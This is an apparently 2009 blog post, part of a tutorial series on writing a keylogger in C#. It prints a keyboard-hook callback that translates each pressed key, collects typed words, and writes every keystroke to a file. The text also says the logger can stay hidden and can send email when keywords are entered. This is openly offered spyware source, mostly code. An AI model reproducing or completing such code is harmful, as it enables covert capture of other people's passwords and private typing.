Keylogger in C# :: Detecting pressed keys
by Arxleol on Monday 26.10.2009, under C#, tutorial, windows
Its been a while since I wrote in this line of tutorials and it is time to finish the line. So expect more coming soon. Now, on the business this tutorial will be about detecting pressed keys. In this tutorial we will show how to detect pressed keys. The following function is called when key is pressed. However, you remember introduction in which we explained creating hook and such. In the constructor you should call function that will be called in case key is pressed.
Hook.CreateHook(KeyReaderr);
KeyReaderr is the name of function that will be called in case key hook is active function KeyReaderr will be called.
public void KeyReaderr(IntPtr wParam, IntPtr lParam) { int key = Marshal.ReadInt32(lParam); Hook.VK vk = (Hook.VK)key; String temp = ""; switch (vk) { case Hook.VK.VK_F1: temp = "<-F1->"; break; case Hook.VK.VK_F2: temp = "<-F2->"; break; case Hook.VK.VK_F3: temp = "<-F3->"; break; case Hook.VK.VK_F4: temp = "<-F4->"; break; case Hook.VK.VK_F5: temp = "<-F5->"; break; case Hook.VK.VK_F6: temp = "<-F6->"; break; case Hook.VK.VK_F7: temp = "<-F7->"; break; case Hook.VK.VK_F8: temp = "<-F8->"; break; case Hook.VK.VK_F9: temp = "<-F9->"; break; case Hook.VK.VK_F10: temp = "<-F10->"; break; case Hook.VK.VK_F11: temp = "<-F11->"; break; case Hook.VK.VK_F12: temp = "<-F12->"; break; case Hook.VK.VK_NUMLOCK: temp = "<-numlock->"; break; case Hook.VK.VK_SCROLL: temp = "<-scroll>"; break; case Hook.VK.VK_LSHIFT: temp = "<-left shift->"; break; case Hook.VK.VK_RSHIFT: temp = "<-right shift->"; break; case Hook.VK.VK_LCONTROL: temp = "<-left control->"; break; case Hook.VK.VK_RCONTROL: temp = "<-right control->"; break; case Hook.VK.VK_SEPERATOR: temp = "|"; break; case Hook.VK.VK_SUBTRACT: temp = "-"; break; case Hook.VK.VK_DECIMAL: temp = "."; break; case Hook.VK.VK_DIVIDE: temp = "/"; break; case Hook.VK.VK_NUMPAD0: temp = "0"; break; case Hook.VK.VK_NUMPAD1: temp = "1"; break; case Hook.VK.VK_NUMPAD2: temp = "2"; break; case Hook.VK.VK_NUMPAD3: temp = "3"; break; case Hook.VK.VK_NUMPAD4: temp = "4"; break; case Hook.VK.VK_NUMPAD5: temp = "5"; break; case Hook.VK.VK_NUMPAD6: temp = "6"; break; case Hook.VK.VK_NUMPAD7: temp = "7"; break; case Hook.VK.VK_NUMPAD8: temp = "8"; break; case Hook.VK.VK_NUMPAD9: temp = "9"; break; case Hook.VK.VK_Q: temp = "q"; break; case Hook.VK.VK_W: temp = "w"; break; case Hook.VK.VK_E: temp = "e"; break; case Hook.VK.VK_R: temp = "r"; break; case Hook.VK.VK_T: temp = "t"; break; case Hook.VK.VK_Y: temp = "y"; break; case Hook.VK.VK_U: temp = "u"; break; case Hook.VK.VK_I: temp = "i"; break; case Hook.VK.VK_O: temp = "o"; break; case Hook.VK.VK_P: temp = "p"; break; case Hook.VK.VK_A: temp = "a"; break; case Hook.VK.VK_S: temp = "s"; break; case Hook.VK.VK_D: temp = "d"; break; case Hook.VK.VK_F: temp = "f"; break; case Hook.VK.VK_G: temp = "g"; break; case Hook.VK.VK_H: temp = "h"; break; case Hook.VK.VK_J: temp = "j"; break; case Hook.VK.VK_K: temp = "k"; break; case Hook.VK.VK_L: temp = "l"; break; case Hook.VK.VK_Z: temp = "z"; break; case Hook.VK.VK_X: temp = "x"; break; case Hook.VK.VK_C: temp = "c"; break; case Hook.VK.VK_V: temp = "v"; break; case Hook.VK.VK_B: temp = "b"; break; case Hook.VK.VK_N: temp = "n"; break; case Hook.VK.VK_M: temp = "m"; break; case Hook.VK.VK_0: temp = "0"; break; case Hook.VK.VK_1: temp = "1"; break; case Hook.VK.VK_2: temp = "2"; break; case Hook.VK.VK_3: temp = "3"; break; case Hook.VK.VK_4: temp = "4"; break; case Hook.VK.VK_5: temp = "5"; break; case Hook.VK.VK_6: temp = "6"; break; case Hook.VK.VK_7: temp = "7"; break; case Hook.VK.VK_8: temp = "8"; break; case Hook.VK.VK_9: temp = "9"; break; case Hook.VK.VK_SNAPSHOT: temp = "<-print screen->"; break; case Hook.VK.VK_INSERT: temp = "<-insert->"; break; case Hook.VK.VK_DELETE: temp = "<-delete->"; break; case Hook.VK.VK_BACK: temp = "<-backspace->"; break; case Hook.VK.VK_TAB: temp = "<-tab->"; break; case Hook.VK.VK_RETURN: temp = "<-enter->"; break; case Hook.VK.VK_PAUSE: temp = "<-pause->"; break; case Hook.VK.VK_CAPITAL: temp = "<-caps lock->"; break; case Hook.VK.VK_ESCAPE: temp = "<-esc->"; break; case Hook.VK.VK_SPACE: temp = "<-space->"; break; case Hook.VK.VK_PRIOR: temp = "<-page up->"; break; case Hook.VK.VK_NEXT: temp = "<-page down->"; break; case Hook.VK.VK_END: temp = "<-end->"; break; case Hook.VK.VK_HOME: temp = "<-home->"; break; case Hook.VK.VK_LEFT: temp = "<-arrow left->"; break; case Hook.VK.VK_UP: temp = "<-arrow up->"; break; case Hook.VK.VK_RIGHT: temp = "<-arrow right->"; break; case Hook.VK.VK_DOWN: temp = "<-arrow down->"; break; default: break; } writeUp = writeUp + temp; unhide(); checkKeys(); writeToFile(temp); }
There are some additional things in this function we will be using in the following tutorials. But more or less this defines pressed key. We use writeUp because it is used to collect inputted words. unhide function is used when special word is entered to unhide the keylogger if it is hidden. checkKeys is checking whether keyword is entered. This function in fact checks whether keyword is entered and provides notice to user, can be also used to send email or something similar. writeToFile is writing pressed keys into file on the system.
Monday 26.10.2009 on 22:44
[...] Detecting pressed keys [...]